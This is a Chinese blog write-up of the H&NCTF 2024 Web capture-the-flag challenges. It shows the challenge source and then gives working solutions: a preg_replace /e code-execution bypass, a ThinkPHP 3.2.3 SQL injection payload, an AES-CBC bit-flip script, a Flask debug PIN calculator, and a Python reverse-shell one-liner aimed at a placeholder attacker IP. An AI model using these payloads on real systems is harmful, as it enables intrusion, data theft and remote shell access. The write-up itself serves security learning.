H&NCTF2024(Web方向)

最新推荐文章于 2024-06-13 02:48:16 发布
最新推荐文章于 2024-06-13 02:48:16 发布
阅读量410 收藏 10
点赞数 11
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46548764/article/details/138907973
版权

文章目录

1. Please_RCE_Me

 <?php
if($_GET['moran'] === 'flag'){
    highlight_file(__FILE__);
    if(isset($_POST['task'])&&isset($_POST['flag'])){
        $str1 = $_POST['task'];
        $str2 = $_POST['flag'];
        if(preg_match('/system|eval|assert|call|create|preg|sort|{|}|filter|exec|passthru|proc|open|echo|`| |\.|include|require|flag/i',$str1) || strlen($str2) != 19 || preg_match('/please_give_me_flag/',$str2)){
            die('hacker!');
        }else{
            preg_replace("/please_give_me_flag/ei",$_POST['task'],$_POST['flag']);
        }
    }
}else{
    echo "moran want a flag.</br>(?moran=flag)";
}

preg_replace 函数使用了e修饰符,会导致代码执行,同时使用了i修饰符,即忽略大小写。可以使用大小写绕过preg_match匹配部分,POC如下:

GET /?moran=flag&1=/flag
POST task=show_source($_GET[1])&flag=Please_give_me_flag

在这里插入图片描述

2. ez_tp

<?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller {
    public function index(){
        //$this->show('<style type="text/css">*{ padding: 0; margin: 0; } div{ padding: 4px 48px;} body{ background: #fff; font-family: "微软雅黑"; color: #333;font-size:24px} h1{ font-size: 100px; font-weight: normal; margin-bottom: 12px; } p{ line-height: 1.8em; font-size: 36px } a,a:hover{color:blue;}</style><div style="padding: 24px 48px;"> <h1>:)</h1><p>欢迎使用 <b>ThinkPHP</b>!</p><br/>版本 V{$Think.version}</div><script type="text/javascript" src="http://ad.topthink.com/Public/static/client.js"></script><thinkad id="ad_55e75dfae343f5a1"></thinkad><script type="text/javascript" src="http://tajs.qq.com/stats?sId=9347272" charset="UTF-8"></script>','utf-8');
        header("Content-type:text/html;charset=utf-8");
        echo '装起来了';
    }
    public function h_n(){
        function waf() {
            if (!function_exists('getallheaders')) {
                function getallheaders() {
                    foreach ($_SERVER as $name => $value) {
                        if (substr($name, 0, 5) == 'HTTP_') $headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5))))) ] = $value;
                    }
                    return $headers;
                }
            }
            $get = $_GET;
            $post = $_POST;
            $cookie = $_COOKIE;
            $header = getallheaders();
            $files = $_FILES;
            $ip = $_SERVER["REMOTE_ADDR"];
            $method = $_SERVER['REQUEST_METHOD'];
            $filepath = $_SERVER["SCRIPT_NAME"];
            //rewirte shell which uploaded by others, you can do more
            foreach ($_FILES as $key => $value) {
                $files[$key]['content'] = file_get_contents($_FILES[$key]['tmp_name']);
                file_put_contents($_FILES[$key]['tmp_name'], "virink");
            }
            unset($header['Accept']); //fix a bug
            $input = array(
                "Get" => $get,
                "Post" => $post,
                "Cookie" => $cookie,
                "File" => $files,
                "Header" => $header
            );
            //deal with
            $pattern = "insert|update|delete|and|or|\/\*|\*|\.\.\/|\.\/|into|load_file|outfile|dumpfile|sub|hex";
            $pattern.= "|file_put_contents|fwrite|curl|system|eval|assert";
            $pattern.= "|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore";
            $pattern.= "|`|dl|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec";
            $vpattern = explode("|", $pattern);
            $bool = false;
            foreach ($input as $k => $v) {
                foreach ($vpattern as $value) {
                    foreach ($v as $kk => $vv) {
                        if (preg_match("/$value/i", $vv)) {
                            $bool = true;
                            break;
                        }
                    }
                    if ($bool) break;
                }
                if ($bool) break;
            }
            return $bool;
        }

        $name = I('GET.name');
        $User = M("user");

        if (waf()){
            $this->index();
        }else{
            $ret = $User->field('username,age')->where(array('username'=>$name))->select();
            echo var_export($ret, true);
        }

    }
}

涉及thinkphp3.2.3_SQL注入漏洞,参考:https://y4er.com/posts/thinkphp3-vuln,POC如下:

/index.php/Home/Index/h_n?name[0]=exp&name[1]==1 or 1 union select 1,flag from flag

在这里插入图片描述

3. flipPin

from flask import Flask, request, abort
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad
from flask import Flask, request, Response
from base64 import b64encode, b64decode

import json

default_session = '{"admin": 0, "username": "user1"}'
key = get_random_bytes(AES.block_size)


def encrypt(session):
    iv = get_random_bytes(AES.block_size)
    cipher = AES.new(key, AES.MODE_CBC, iv)
    return b64encode(iv + cipher.encrypt(pad(session.encode('utf-8'), AES.block_size)))


def decrypt(session):
    raw = b64decode(session)
    cipher = AES.new(key, AES.MODE_CBC, raw[:AES.block_size])
    try:
        res = unpad(cipher.decrypt(raw[AES.block_size:]), AES.block_size).decode('utf-8')
        return res
    except Exception as e:
        print(e)

app = Flask(__name__)

filename_blacklist = {
    'self',
    'cgroup',
    'mountinfo',
    'env',
    'flag'
}

@app.route("/")
def index():
    session = request.cookies.get('session')
    if session is None:
        res = Response(
            "welcome to the FlipPIN server try request /hint to get the hint")
        res.set_cookie('session', encrypt(default_session).decode())
        return res
    else:
        return 'have a fun'

@app.route("/hint")
def hint():
    res = Response(open(__file__).read(), mimetype='text/plain')
    return res


@app.route("/read")
def file():
    session = request.cookies.get('session')
    if session is None:
        res = Response("you are not logged in")
        res.set_cookie('session', encrypt(default_session))
        return res
    else:
        plain_session = decrypt(session)
        if plain_session is None:
            return 'don\'t hack me'

        session_data = json.loads(plain_session)

        if session_data['admin'] :
            filename = request.args.get('filename')

            if any(blacklist_str in filename for blacklist_str in filename_blacklist):
                abort(403, description='Access to this file is forbidden.')

            try:
                with open(filename, 'r') as f:
                    return f.read()
            except FileNotFoundError:
                abort(404, description='File not found.')
            except Exception as e:
                abort(500, description=f'An error occurred: {str(e)}')
        else:
            return 'You are not an administrator'


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=9091, debug=True)

考点是AES-CBC字节翻转、flask pin码计算,AES-CBC字节翻转脚本如下:

# -*- coding:utf8 -*-
import base64
import urllib.parse
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad
from base64 import b64encode, b64decode

"""
    1. 分组 16个字节一组
"""

# {"admin": 0, "us
# ername": "user1"
# }

"""
    2. 获取原始密文
"""
ciphertext = 'wv7sRdpuU1HMAgqUWAOjoZuLsH9jUDnCaVtBxN8fQH6zyxmGqarbH7R/cuSUVx1xnKKDoUjIeo1GQwkg39DZ6Q=='
cipher = base64.b64decode(urllib.parse.unquote(ciphertext))
array_cipher = bytearray(cipher)

"""
    3, 字节翻转
"""
offset = 10
array_cipher[offset] =  array_cipher[offset]^ ord('0') ^ ord('1')
print('newCipher:',urllib.parse.quote(base64.b64encode(array_cipher)))

替换伪造的Cookie信息,即可利用文件读取漏洞来获取pin码计算六要素,pin计算脚本如下:

import hashlib
from itertools import chain
probably_public_bits = [
    'ctfUser', # /etc/passwd
    'flask.app', # 模式名,默认
    'Flask', # 应用名,默认
    '/usr/lib/python3.9/site-packages/flask/app.py' # 应用目录
]

private_bits = [
    '116853226196301', # /read?filename=sys/class/net/eth0/address
    'f67849d6-0b58-4a19-8e76-938d747b1e66dfb4ad54804b2fc5341f6b92e5c00dd69908f32e77c3be12ed4c26aa6783f210'# get_machine_id(), /etc/machine-id  /proc/sys/kernel/random/boot_id
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode("utf-8")
    h.update(bit)
h.update(b"cookiesalt")

cookie_name = f"__wzd{h.hexdigest()[:20]}"

# If we need to generate a pin we salt it a bit more so that we don't
# end up with the same value and generate out 9 digits
num = None
if num is None:
    h.update(b"pinsalt")
    num = f"{int(h.hexdigest(), 16):09d}"[:9]

# Format the pincode in groups of digits for easier remembering if
# we don't have a result yet.
rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = "-".join(
                num[x : x + group_size].rjust(group_size, "0")
                for x in range(0, len(num), group_size)
            )
            break
    else:
        rv = num

print(rv)

计算完pin码之后拼接访问:/console,键入pin码即可执行python代码。后续利用python反弹shell,在env里面找到flag。

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击者IP",端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

在这里插入图片描述

4. GPTS

参考:https://xz.aliyun.com/t/14283,前台存在Pickle反序列漏洞。

Zue3r
关注
  • 11
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
H&NCTF 2024 Re 全解WP(带附件加详细解析)
05-30
H&NCTF 2024 Re 全解WP(带附件加详细解析)
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
Web】H&NCTF 2024 题解(部分)
uuzeray的博客
05-14 1129
先切回ctfer,sudo adduser kobe创建一个kobe用户。题目是对java文件进行编译操作,就是系统命令执行javac拼接文件名。./main.go是403访问./main-old.zip下载附件。是一个方便的命令行工具,用于在 Linux 系统中管理用户账户。查看/var/mail/ctfgame,读邮件中的敏感信息。没权限看/etc/sudoers ,用sudo -l。命令的特权,而且无需输入密码,但被限制不能以。看到kobe,可以apt-get提权。结合源码,能看出考的是sql注入。
H&NCTF2024 Re Misc 题解(相同二进制样本变异逆向分析)
一个啥也不会的小菜鸡!
05-14 801
一共要交互128次的样子,flag就被输出了!# 解密 base64 字符串# 寻找匹配的字节序列# 如果找到匹配的字节序列= -1:# 寻找等于0x34的数据的下一个数据index = match_index + 3 # 匹配字节序列之后的索引while len(extracted_data) < 0x18: # 提取0x18个元素if decoded_data[index] == 0x34: # 如果当前数据等于0x34。
【2024H&NCTF】密码组部分出题记录
jayq1的博客
05-14 1234
2024H&NCTF 密码组部分出题记录,BabyPQ&HappyDance,有不足之处,还望师傅们批评指正!
HNCTF 2022 week1 web方向题解
m0_74160536的博客
08-01 640
简单说一下file伪协议,也是引用的别人博客(https://blog.csdn.net/qq_37466661/article/details/126203437)但正常情况下,我们输入php?filter=flag.php,只会发现一片空白,这时就需要用到php伪协议了,而这道题使用的就是file伪协议。检查-网络-刷新网页,只有两个网络响应,不过另一个是图标,不用管,打开cookie,提示去/f14g.php,跳转。打开环境,是一个小游戏,目标是2000分,不用管,小游戏题基本都是找js代码。
[H&NCTF 2024] crypto/pwn
weixin_52640415的博客
05-15 1147
矩阵形式的RSA 奇偶的shellcode 写IO结构造ROP
H&NCTF 部分ReWP
2301_79265644的博客
05-14 366
然后就丢到ida里分析吧,分析结束,顺利找到main函数,得到伪代码,可是一看,几千行,什么鬼,然后也通过查找字符串,想找到最后做判断的地方,找是找到了,可是很离谱,没什么用,试了这些东西后,又想起来既然给了迷宫,那么我们是不是可以通过直接走迷宫的方式来试一试呢,然后就开始了尝试,可是发现,这压根走不通,所谓的asdw,不是一步一步的走,按一次走两步,根本不可能走的到$,就说明这题似乎和迷宫无关了。拿到附件,解压缩,先跑一下看看回显,没什么,就是让我们输入flag,然后判断正确,查壳,没有壳,
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
2024NCTF部分题目资源包
02-06
2024/02/03,36h 为什么举办? 作为国内TOP CTF战队,Nu1L Team自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是...
harmonyos2-Inn0vHackti0n.github.io:Inn0vHackti0nCTF团队网站
07-01
和声2 和谐 Harmony 是一个响应式 jekyll 主题。 为 jekyll 2.x 构建 支持 Google 分析和 RSS 提要 基于 Sass ...是一个静态站点生成器,一个开源工具,用于创建各种形状和大小的简单而强大的网站。...j
HZNUCTF2024初赛
2303_81165358的博客
05-05 951
但是与v12不同的是, std::string::operator+=(v11, "#")说明v11在加了“#”后经过Xor函数返回值一定是1,故v6一定是0,所以v7必须是1,也就是v12一定是0,因为v12=v15,所以v15一定是0,而v15是v13和v14异或的结果,所以v13=v14,v13是输入的flag,所以flag是v14,因为std::string::basic_string(v14, &v[abi:cxx11]);发现它是比较字符串是否相等的函数,相等返回0,不同返回1。
H&NCTF ——baby_python
Nike_name的博客
05-16 919
半成品——python反序列化
【2024】H&NCTF
qq_66013948的博客
05-22 1142
preg_replace 使用了 /e 模式,导致可以代码执行,而且该函数的第一个和第三个参数都是我们可以控制的。我们都知道, preg_replace 函数在匹配到符号正则的字符串时,会将替换字符串(也就是上图 preg_replace 函数的第二个参数)当做代码来执行最后得到flag。
JS中一个dom元素能绑定多少事件
ggq53219的博客
06-10 550
在JavaScript中,一个DOM元素可以绑定的事件数量并没有明确的限制,这主要取决于浏览器的实现和内存限制。然而,在实际应用中,为同一个DOM元素绑定过多的事件监听器可能会导致性能问题,尤其是在事件处理函数执行复杂操作的情况下。总之,虽然JavaScript中DOM元素可以绑定的事件数量没有明确的限制,但在实际应用中应注意避免过度绑定和优化事件处理函数,以确保良好的性能和用户体验。
Web前端网站设计案例:深入剖析创意与技术的完美融合
liyrbtqe_66w的博客
06-12 284
在性能优化方面,设计师通过压缩代码、减少HTTP请求、使用CDN等技术手段,提升了网站的加载速度和响应性能,为用户提供了更加流畅的访问体验。综上所述,本Web前端网站设计案例通过视觉设计、用户体验、技术实现、性能优化、创意表达、响应式设计和跨平台兼容等方面的综合考量,成功打造了一款既美观又实用的网站。这个案例充分展示了Web前端设计的魅力和潜力,为未来的网站设计提供了有益的借鉴和启示。设计师通过独特的视觉元素和创意构思,将品牌理念和文化内涵融入其中,使得整个网站在传达信息的同时,也展现出品牌的独特魅力。
Harmony 开发的艺术 面向对象
最新发布
不懂先生的博客
06-13 1059
然后你可以创建多个子类,如“圆形”、“矩形”和“三角形”,它们都继承自“形状”类并实现了自己的“绘制”方法。尽管每个对象的类型可能不同(圆形、矩形、三角形等),但由于它们都继承了“形状”类并实现了相同的“绘制”方法,因此你可以通过父类引用来统一调用它们的方法。然后你可以创建一个“狗”类,它继承自“动物”类,并添加或覆盖一些特定的属性和方法(如“叫”和“摇尾巴”)。所以面向对象的三大特征(封装、继承、多态)在java语言中很容易实现的设计,搬到早期的JavaScript中,就变噩梦一样的存在。
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过不断尝试不同的字符,构造SQL语句进行盲注,判断是否成功绕过过滤。引用\[3\]提供了一个Python脚本的示例,可以用来自动化进行尝试。该脚本通过构造不同长度的payload,逐位尝试密码的每一位字符,直到获取到完整的密码。 #### 引用[.reference_title] - *1* [[NCTF2019]SQLi --BUUCTF --详解](https://blog.csdn.net/l2872253606/article/details/125265138)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[NCTF2019]SQLi(Regexp注入)](https://blog.csdn.net/weixin_45669205/article/details/116137824)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [[NCTF2019]SQLi](https://blog.csdn.net/shinygod/article/details/124100832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值